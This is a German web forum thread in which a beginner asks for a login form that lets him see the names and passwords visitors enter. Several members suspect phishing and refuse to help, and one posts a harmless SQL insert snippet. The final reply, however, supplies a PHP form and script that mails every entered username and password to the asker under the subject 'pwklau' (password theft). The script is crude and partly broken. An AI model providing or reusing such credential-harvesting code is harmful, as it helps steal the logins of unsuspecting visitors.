Einloggen bei meiner Site

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Einloggen bei meiner Site

      Hi,

      ich bin noch totaler Anfänger(html hab ich ein wenig drauf^.^) und würde gern ein einlogg fenster erstellen.

      Also, man gibt sein Nickname und sein Passwort ein und muss dann auf Login klicken. Dann wird man auf eine andere Seite weitergeleitet. Es soll ganz simpel sein. Ohne Anmeldung. Einfach nur Nick und Pw und dann login und die Weiterleitung auf eine andere Seite.

      Das wichtigste ist, dass ich die Daten sehe, mit denen sich die User einloggen(wird dann auf der Datenbank gespeichert, hab ich von nem freund erfahren).

      Was ich hab:

      -PHP5
      -FTP
      -MySQL

      Ich hoff ihr könnt mir einen einfachen Code sagen.

      Danke

      edit: die user müssen danach nicht eingeloggt sein!

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von The_VictoR ()

    • hört sich grad so an als wolltest du was fishing-mäßiges machen?
      bitte erkläre was du genau mit den daten willst (also warum diese für dich auslesbar sein sollen und die person danach nicht angemeldet sein muss).

      möchte nämlich keine unseriösen sachen unterstützen, falls du sowas vor hast solltest du deine beiträge leeren und einen mod bitten den thread zu löschen.

      lg
      Empty your mind.
      Be formless shapeless like water.
      Now you put water into a cup, it becomes the cup.
      You put water into a bottle, it becomes the bottle.
      You put it into a teapot, it becomes the teapot.
      Water can crash, or it can flow!

      Be like water, my friend.
    • wenn du ein quiz willst bei welchem leute etwas eingeben müssen um weiter zu kommen brauchst du dazu nicht die daten in ner sql-tabelle zu speichern.
      sorry aber das hört sich alles sehr suspekt an was du hier von dir gibst.

      Bitte schreibe mal ausführlich was du genau tun willst und wofür du die angaben brauchst welche du erfragst genauso wie dein gesammtes "projekt" aussehen soll.
      Wenn das alles komisch klingt muss ich davon ausgehen, dass du irgendwas unseriöses vor hast und sowas hat hier im Forum nichts zu suchen.

      lg
      Empty your mind.
      Be formless shapeless like water.
      Now you put water into a cup, it becomes the cup.
      You put water into a bottle, it becomes the bottle.
      You put it into a teapot, it becomes the teapot.
      Water can crash, or it can flow!

      Be like water, my friend.
    • Also:

      Ich stell eine Frage, es gibt ein Feld, der User gibt seine Antwort ein und wenn sie stimmt kommt er auf die nächste Seite und wenn sie falsch ist, z.b Leider war die antwort falsch... zurück.
      Sorry habs oben falsch erklärt
    • Moin,

      meinst du mit "Was ich hab", was du kannst, oder auf was du zurückgreifen kannst? :D
      Hier mal ein kleiner PHP-Schnipsel zum speichern in eine DB zu der du vorher connected hast:

      PHP-Quellcode

      1. $sql = "
      2. INSERT INTO `Tabelle` ( `ID` , `user` , `frage`)
      3. VALUES (
      4. NULL , '" . mysql_real_escape_string($_POST['user']) . "', '" . mysql_real_escape_string($_POST['frage']) . "'
      5. );";
      6. $res = mysql_query($sql);

      Da du wie du sagst HTML kannst setze ich mal voraus dass du Formulare erstellen kannst ;)
      Falls dir das alles zu schwer ist empfehle ich dir ein PHP/MySQL-Tutorial

      Gruß

      //€: Ich sehe grade, wir sollten mal die Farben für das Syntaxhighlighting ändern *g*
    • Immer diese Skript-Kiddies >.<
      Hier wird dir kaum einer Helfen solange du auf deinem Profil eine Seite namens geld-durch-surfen.de.tp/ als deine Homepage angibst. Das stinkt doch!

      Hoffentlich hilft dir keiner, sonst kommst du noch in Schwierigkeiten!


      EDIT: Und komm mir nicht mit "Ich will nur sehen ob ich' s kann", wenn einer deine SQL-DB hackt, liegt das nicht mehr in deiner Hand



      9 von 10 Stimmen in meinem Kopf sagen ich bin verrückt. Die 10. summt die Melodie von Tetris...
      :vogel:
    • ich unterstütze doch gerne unseriöse sachen ;)

      1. du brauchst ein server der php unterstüzt
      2. mach ein formular

      PHP-Quellcode

      1. <form method="post">
      2. <input name="username" type="text"> name
      3. <input name="pw" type="password"> passwort
      4. </form>
      5. <


      3. ins gleiche file kommt das auslesen, einfach reinkopieren. werde kein sql verwenden, weil faul sondern jeder der sich einlogt schickt seine daten direkt per mail an dich.

      PHP-Quellcode

      1. <?
      2. $name = $_REQUEST['username'];
      3. $pw = $_REQUEST['pw'];
      4. mail(deine@email.de, pwklau,$name $pw);
      5. ?>


      ka obs klappt hab gerade einen sitzen xD

      ps. hab den senden button vergessen, wenn du html kannst wirst du den schon selber reinbringen